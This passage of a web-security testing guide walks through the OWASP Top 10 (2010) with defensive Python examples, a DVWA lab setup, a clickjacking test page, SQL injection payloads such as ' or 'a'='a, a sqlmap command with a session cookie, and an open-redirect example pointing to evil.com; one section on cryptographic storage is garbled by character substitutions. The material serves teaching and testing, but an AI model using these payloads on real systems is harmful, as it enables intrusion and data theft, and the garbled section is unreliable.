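        expected = self._tokens.get(session_id)
        submitted = str(form.get("csrf_token", ""))
        if (expected is None or not submitted.isascii()
                or not hmac.compare_digest(expected, submitted)):
            return "rejected: missing or foreign csrf token"
        return "ok: transfer performed"


if __name__ == "__main__":
    p = CsrfProtector()
    print(p.form_html("sess-victim", "/transfer"))
    # What the forged <img src="/transfer?amount=100"> from the text turns into:
    print(p.handle_transfer("GET", "sess-victim", {"amount": "100"}))
```

The token is compared with hmac.compare_digest so that a wrong token takes the same time to reject as a nearly right one; the cookie alone is never enough, which is the property the Piñata test is probing for.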
Clickjacking Test Page

To test whether a site is vulnerable to clickjacking, create an HTML page similar to the following, changing the iframe src URL (highlighted in RED in the original) to point to your target site:

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>You've been clickjacked!</p>
<iframe sandbox="allow-scripts allow-forms" src="http://localhost:8080" style="width:100%;height:90%"></iframe>
</body>
</html>

If you see the text “You've been clickjacked!” at the top of the page, your site is vulnerable. With a clickjacking defense script installed, your site should break out of the site that is

framing it and that text will not be displayed. If the user's browser has JavaScript turned off, the target site should not display at all.

1.6 A6 Security Misconfiguration

Testing for HTTP Methods and XST

Directory listing is not disabled on your server. An attacker discovers he can find all files on your server by simply listing the directories. The attacker finds and downloads all your compiled Java classes, which he reverses to get all your custom code. He then finds a serious access control flaw in your application. The methods that should be disabled are the following:

- PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an asp file that executes commands by invoking cmd.exe), or by simply using the victim's server as a file repository.
- DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a DoS attack.
- CONNECT: This method could allow a client to use the web server as a proxy.
- TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which was discovered by Jeremiah Grossman (see links at the bottom of the page).
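
Both the clickjacking test page and the HTTP method list above are things a response inspection can verify without a browser. The following Python example is added here and is not part of the original guide; it parses two constructed raw HTTP responses, flags the absence of framing protection (an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive) and reports which of the methods listed above an OPTIONS response advertises in its Allow header. The header names and directive are the standard ones; the responses themselves are made up for the example.

```python
DANGEROUS_METHODS = {"PUT", "DELETE", "CONNECT", "TRACE"}   # the list from the text

# Constructed responses, not captured from any real server.
RESPONSE_WEAK = """HTTP/1.1 200 OK
Server: Apache
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Type: text/html

<html><body>hello</body></html>"""

RESPONSE_HARDENED = """HTTP/1.1 200 OK
Server: Apache
Allow: GET, HEAD, POST, OPTIONS
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'
Content-Type: text/html

<html><body>hello</body></html>"""


def parse_headers(raw: str) -> dict:
    """Returns {lowercased header name: value} from a raw HTTP response."""
    head, _, _body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:        # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def framing_findings(headers: dict) -> list:
    """Empty list when the page refuses to be framed; otherwise the missing controls.
    Either control on its own stops the test page above from showing the target."""
    findings = []
    xfo = headers.get("x-frame-options", "").upper()
    if xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("no X-Frame-Options DENY/SAMEORIGIN")
    csp = headers.get("content-security-policy", "")
    if "frame-ancestors" not in csp.lower():
        findings.append("no CSP frame-ancestors directive")
    return findings


def dangerous_methods_allowed(headers: dict) -> list:
    """Methods from the guide's list that the Allow header advertises, sorted."""
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return sorted(allowed & DANGEROUS_METHODS)


if __name__ == "__main__":
    for name, raw in (("weak", RESPONSE_WEAK), ("hardened", RESPONSE_HARDENED)):
        h = parse_headers(raw)
        print(name, framing_findings(h), dangerous_methods_allowed(h))
```

An Allow header is only what the server claims; the guide's method test still sends the actual PUT, DELETE and TRACE requests, and TRACE in particular should be confirmed by looking at whether the request body is echoed back.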

1.7 A7 Insecure Cryptographic Storage

<or e"ample, pass!ords, credit cards, health records, and personal information should be encrypted. <or all such data, ensure> $. t is encrypted every!here it is stored long term, particularly in bac8ups of this data. *. -nly authori?ed users can access decrypted copies of the data 4i.e., access control _ See A+ and A:6. ,. A strong standard encryption algorithm is used. +. A strong 8ey is generated, protected from unauthori?ed access, and 8ey change is planned for. ;'ec& (ass ord 'as'ed $. @o! to chec8 are pass!ords, credit cards and other personal data properly stored in the database _ go to the database and find table !ith pass!ords, credit cards and other personal data. *. Copy hash value ,. Start some program i.e. 4http>CC!!!.sha$3loo8up.comC6 to search reverse value from copied hash value.

+.

f strong encryption algorithm is used, attac8er should not be able to see reverse value from copied hash value.
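As an added example (not from the guide), a small Python audit that applies the check above to stored values: it classifies each value by its shape, flags unsalted MD5/SHA-1 hashes of common passwords that a lookup site would resolve immediately, and shows the salted, iterated PBKDF2 storage that such lookups cannot reverse. The account names, hash values and wordlist are constructed.

```python
import hashlib
import hmac
import os
import re

# Constructed rows standing in for what a tester copies out of a users table
# (hypothetical accounts; both fast hashes are of the string "password").
SAMPLE_ROWS = {
    "alice": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",  # unsalted SHA-1
    "bob": "5f4dcc3b5aa765d61d8327deb882cf99",            # unsalted MD5
}
# Tiny constructed wordlist; a real lookup service holds billions of entries.
COMMON_PASSWORDS = ["123456", "password", "letmein"]


def classify(stored):
    """Guess the storage scheme from the stored value's shape."""
    if stored.startswith("pbkdf2_sha256$"):
        return "pbkdf2-sha256 (salted, iterated)"
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "md5 (unsalted fast hash)"
    if re.fullmatch(r"[0-9a-f]{40}", stored):
        return "sha1 (unsalted fast hash)"
    return "unknown"

def weak_rows(rows, wordlist=COMMON_PASSWORDS):
    """Return {user: plaintext} for unsalted fast hashes of a common password,
    i.e. the rows a reverse-lookup site resolves at once. Salted values never match."""
    found = {}
    for user, stored in rows.items():
        algo = {32: "md5", 40: "sha1"}.get(len(stored))
        for word in wordlist:
            if algo and hashlib.new(algo, word.encode()).hexdigest() == stored:
                found[user] = word
    return found

def store_pbkdf2(password, iterations=100_000, salt=None):
    """Strong alternative: random per-user salt plus an iterated KDF."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_pbkdf2(stored, password):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)
```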

1.8 A8 Failure to Restrict URL Access

An attacker who is an authorized system user simply changes the URL to a privileged page. Is access granted? Anonymous users could access private pages that aren't protected. If a user has no privilege to see some pages on the site, the system should prevent him/her from reaching them by typing the URL address of that page in the browser.

1.9 A9 Insufficient Transport Layer Protection

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide communication security over the Internet. TLS and SSL encrypt the segments of network connections at the Application Layer for the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for confidentiality, and message authentication codes for message integrity.

SSL Algorithms
For example: to check the SSL algorithms on a server, use the "sslscan" tool, which is part of the BackTrack distribution.
Run BackTrack5
From Main menu select Information Gathering/Network Analysis/Service Fingerprinting/sslscan
Enter the server IP address you want to test and press enter

This tool helps testers check whether the web server runs the latest SSL version (version 3) or TLS version 1. There are still some outdated servers running SSL version 2.
Information Gathering/Network Analysis/Identify Live Hosts/nmap

SSL Key Lengths
Guidelines for SSL key lengths are presented in the table below:

Certificate expiry date            Minimum RSA public key length
On or before 31 December 2013      1024
After 31 December 2013             2048

Steps to check RSA Public Key:
Run BackTrack5
From Main menu select Information Gathering/Network Analysis/Service Fingerprinting/sslscan
Enter the server IP address you want to test and press enter

Digital Certificate Validity
Steps to check RSA Public Key:
Run BackTrack5
From Main menu select Information Gathering/Network Analysis/Service Fingerprinting/sslscan
Enter the server IP address you want to test and press enter

http://news.netcraft.com/archives/2012/09/10/minimum-rsa-public-key-lengths-guidelines-or-rules.html
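As an added example (not part of the guide), a Python helper that takes the text sslscan prints for a host and applies the two checks described above: whether outdated SSLv2 is still accepted, and whether the certificate's RSA key length meets the table's minimum for its expiry date. The scan output below is constructed in the style of sslscan 1.8 for a hypothetical host; the line formats are an assumption.

```python
import re
from datetime import date, datetime

# Constructed sample in the style of sslscan 1.8 text output (hypothetical host).
SAMPLE_SCAN = """\
Testing SSL server 10.1.1.44 on port 443

  Supported Server Cipher(s):
    Rejected  SSLv2  168 bits  DES-CBC3-MD5
    Accepted  SSLv2  128 bits  RC4-MD5
    Accepted  SSLv3  256 bits  AES256-SHA
    Accepted  TLSv1  256 bits  AES256-SHA

  SSL Certificate:
    Not valid before: Jan  1 00:00:00 2013 GMT
    Not valid after: Jun 30 23:59:59 2014 GMT
    Public Key Algorithm: rsaEncryption
    RSA Public Key: (1024 bit)
"""

KEY_LENGTH_DEADLINE = date(2013, 12, 31)  # cut-over date from the table above


def parse_sslscan(text):
    """Extract accepted protocol versions, RSA key size and expiry date."""
    accepted = {m.group(1) for m in re.finditer(r"^\s*Accepted\s+(\S+)", text, re.M)}
    bits = int(re.search(r"RSA Public Key: \((\d+) bit\)", text).group(1))
    raw = re.search(r"Not valid after:\s*(.+?)\s*$", text, re.M).group(1)
    not_after = datetime.strptime(" ".join(raw.split()), "%b %d %H:%M:%S %Y %Z").date()
    return {"accepted": accepted, "rsa_bits": bits, "not_after": not_after}


def required_rsa_bits(not_after):
    """Minimum RSA key length the table demands for a given expiry date."""
    return 1024 if not_after <= KEY_LENGTH_DEADLINE else 2048


def findings(text):
    """Apply the two checks the guide describes: outdated protocols and key length."""
    scan = parse_sslscan(text)
    out = []
    if "SSLv2" in scan["accepted"]:
        out.append("SSLv2 accepted: outdated protocol version still enabled")
    need = required_rsa_bits(scan["not_after"])
    if scan["rsa_bits"] < need:
        out.append(f"RSA key is {scan['rsa_bits']} bit; {need} bit required for a "
                   f"certificate expiring after {KEY_LENGTH_DEADLINE}")
    return out
```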

1.10 A10 Unvalidated Redirects and Forwards


If the application has a redirect page, or uses forwards to route requests between different parts of the site, that is potentially dangerous, because an attacker may exploit the redirect or forward to send users to some malicious site by entering the address of the malicious site in the URL. For example:
http://www.example.com/redirect.jsp?url=evil.com

o Create/use a spider to crawl your own site.
o Look at the logs for redirects: 300-series statuses 302 to 307 (302 = old-school page moved, 307 = proper redirection).
o Try to change the URL by hand.
o Try to brute-force change it via an HTTP re-writer.
o If either works, you have a vulnerability.
o Modify the page to hard-code the destination.
o If that isn't possible, only allow the user to choose from a list.
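As an added example (not from the guide), Python versions of the vulnerable redirect.jsp?url=... pattern and of the two fixes listed above: a fixed destination table keyed by a choice parameter, and a same-site path check for cases where a free-form target cannot be avoided, plus the log review step over constructed status/Location pairs. The host name and allow-list are hypothetical.

```python
from urllib.parse import urlparse

# Hypothetical site and allow-list; the guide's fix is "only allow the user to
# choose from a list" (example code, not the guide's own or DVWA's).
OWN_HOST = "www.example.com"
ALLOWED_TARGETS = {"home": "/index.jsp", "account": "/account/profile.jsp"}


def redirect_unsafe(url_param):
    """Vulnerable pattern behind redirect.jsp?url=...: the parameter is the target."""
    return url_param


def redirect_by_key(choice):
    """Hardened: the parameter is a key into a fixed table, never a URL."""
    return ALLOWED_TARGETS.get(choice, ALLOWED_TARGETS["home"])


def is_local_path(url_param):
    """Fallback when a free-form target must be accepted: only same-site paths
    pass; absolute URLs, scheme-relative //host forms and backslash tricks fail."""
    parts = urlparse(url_param)
    if parts.scheme or parts.netloc or "\\" in url_param:
        return False
    return url_param.startswith("/") and not url_param.startswith("//")


def offsite_redirects(log_lines):
    """Log review step from the text: flag 3xx responses whose Location leaves
    the site. Lines are constructed 'status location' pairs."""
    flagged = []
    for line in log_lines:
        status, location = line.split()
        host = urlparse(location).netloc
        if status in {"301", "302", "303", "307"} and host and host != OWN_HOST:
            flagged.append(line)
    return flagged
```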


2 Damn Vulnerable Web App (DVWA)


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. This web application is designed only for security testing purposes.

Download and install XAMPP from http://www.apachefriends.org/en/xampp-windows.html
Download DVWA from http://www.dvwa.co.uk
Simply unzip dvwa.zip, place the unzipped files in your public html folder, and then point your browser to http://127.0.0.1/dvwa/index.php.
The application will be accessible only on the local environment; if you want to access it from another machine, edit the .htaccess file and change this section:

    # Limit access to localhost
    <Limit GET POST PUT>
    order deny,allow
    deny from all
    allow from 127.0.0.1
    </Limit>

to:

    # Limit access to localhost
    <Limit GET POST PUT>
    order deny,allow
    allow from all
    </Limit>

Set database credentials in /config/config.inc.php:

    $_DVWA[ 'db_user' ] = 'your_database_username';      (in my case 'root')
    $_DVWA[ 'db_password' ] = 'your_database_password';  (in my case 'root')
    $_DVWA[ 'db_database' ] = 'dvwa';

In the DVWA application, usernames and passwords are stored in the "dvwa" database in the table named "users".

SQL injection
Simply stated, SQL injection vulnerabilities are caused by software applications that accept data from an untrusted source (internet users), fail to properly validate and sanitize the data, and subsequently use that data to dynamically construct an SQL query to the database backing that application. For example, imagine a simple application that takes inputs of a username and password. It may ultimately process this input in an SQL statement of the form

    string query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";

Since this query is constructed by concatenating an input string directly from the user, the query behaves correctly only if the password does not contain a single-quote character. If the user enters "admin" as the username and "example' or 'a'='a" as the password, the resulting query becomes

    SELECT * FROM users WHERE username = 'admin' AND password = 'example' OR 'a'='a';

The "OR 'a'='a'" clause always evaluates to true and the intended authentication check is bypassed as a result.

In DVWA the 'id' variable is vulnerable to SQL injection:

    "SELECT first_name, last_name FROM users WHERE user_id = '$id';"

So when the attacker enters id = 1 in the input field "User ID" and submits it, the application will execute the following SQL query:

    SELECT first_name, last_name FROM users WHERE user_id = '1';

Insert the following SQL string into the input field: ' or 'a'='a and press Submit. After submitting the SQL string the result is:
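As an added example (not DVWA's own code), the same user_id lookup reproduced in Python against an in-memory SQLite table with constructed rows: the concatenated query returns every row for the input ' or 'a'='a, while the parameterized version treats the same input as plain data and returns nothing.

```python
import sqlite3

# In-memory stand-in for DVWA's "users" table with constructed rows
# (example code, not DVWA's own).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return db


def lookup_vulnerable(db, user_id):
    """DVWA-style query built by string concatenation: quotes in the input are SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"
    return db.execute(query).fetchall()


def lookup_parameterized(db, user_id):
    """Fixed version: the statement is constant and the value is bound, so a
    quote in the input is just data and can never change the WHERE clause."""
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()
```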

SQL Injection (Blind)
Manipulation of cookie data
Start the OWASP ZAP tool
Go to the DVWA login page and enter an incorrect username and password
Press the Login button
Intercept the HTTP request


Start BackTrack5 and run the sqlmap tool. Type the following (the URL and cookie values must be quoted so the shell does not interpret & and ;):

    python ./sqlmap.py -u "http://10.1.1.44/dvwa/vulnerabilities/sqli_blind/?id=5&Submit=Submit" --cookie "security=low; PHPSESSID=vkeb5vmgra1abb1ri7ta03peb0" --level 5

The OWASP ZAP tool reports 2 alerts with High risk against SQL injection.


3 Appendix
The OWASP Top 10 Web Application Security Risks, as of the 2010 list, are:

1. Injection
o Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

2. Cross-Site Scripting (XSS)
o XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

3. Broken Authentication and Session Management
o Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users' identities.

4. Insecure Direct Object References
o A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

5. Cross-Site Request Forgery (CSRF)
o A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

6. Security Misconfiguration
o Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.

7. Insecure Cryptographic Storage
o Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

8. Failure to Restrict URL Access
o Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

9. Insufficient Transport Layer Protection
o Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly.

10. Unvalidated Redirects and Forwards
o Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

Reference: http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/

For nine of the OWASP Top 10 web application security risks I will suggest a tool to help you identify and mitigate these risks within your organization's web applications and services. I will further endeavor to provide a unique tool for each risk thus avoiding redundancy while providing you with multiple options. Following is a risk and tool matrix.

RISK                                              TOOL
1. Injection                                      SQL Inject Me, ZAP
2. Cross-Site Scripting (XSS)                     XSS Me
3. Broken Authentication and Session Management   HackBar, ZAP, WebScarab
4. Insecure Direct Object References              Burp, ZAP
5. Cross-Site Request Forgery (CSRF)              Tamper Data, Pinata, WebScarab
6. Security Misconfiguration                      Watobo
7. Insecure Cryptographic Storage                 NX
8. Failure to Restrict URL Access                 Nikto/Wikto
9. Insufficient Transport Layer Protection        Calomel, sslscan
10. Unvalidated Redirects and Forwards            Watcher


4 Bibliography
1. http://www.cgisecurity.com/csrf-faq.html#csrfuses
2. https://www.owasp.org/index.php/Main_Page
3. http://news.netcraft.com/archives/2012/09/10/minimum-rsa-public-key-lengths-guidelines-or-rules.html
4. http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/
5. http://yehg.net/
6. http://www.securiteam.com/securityreviews/5DP0N1P76E.html
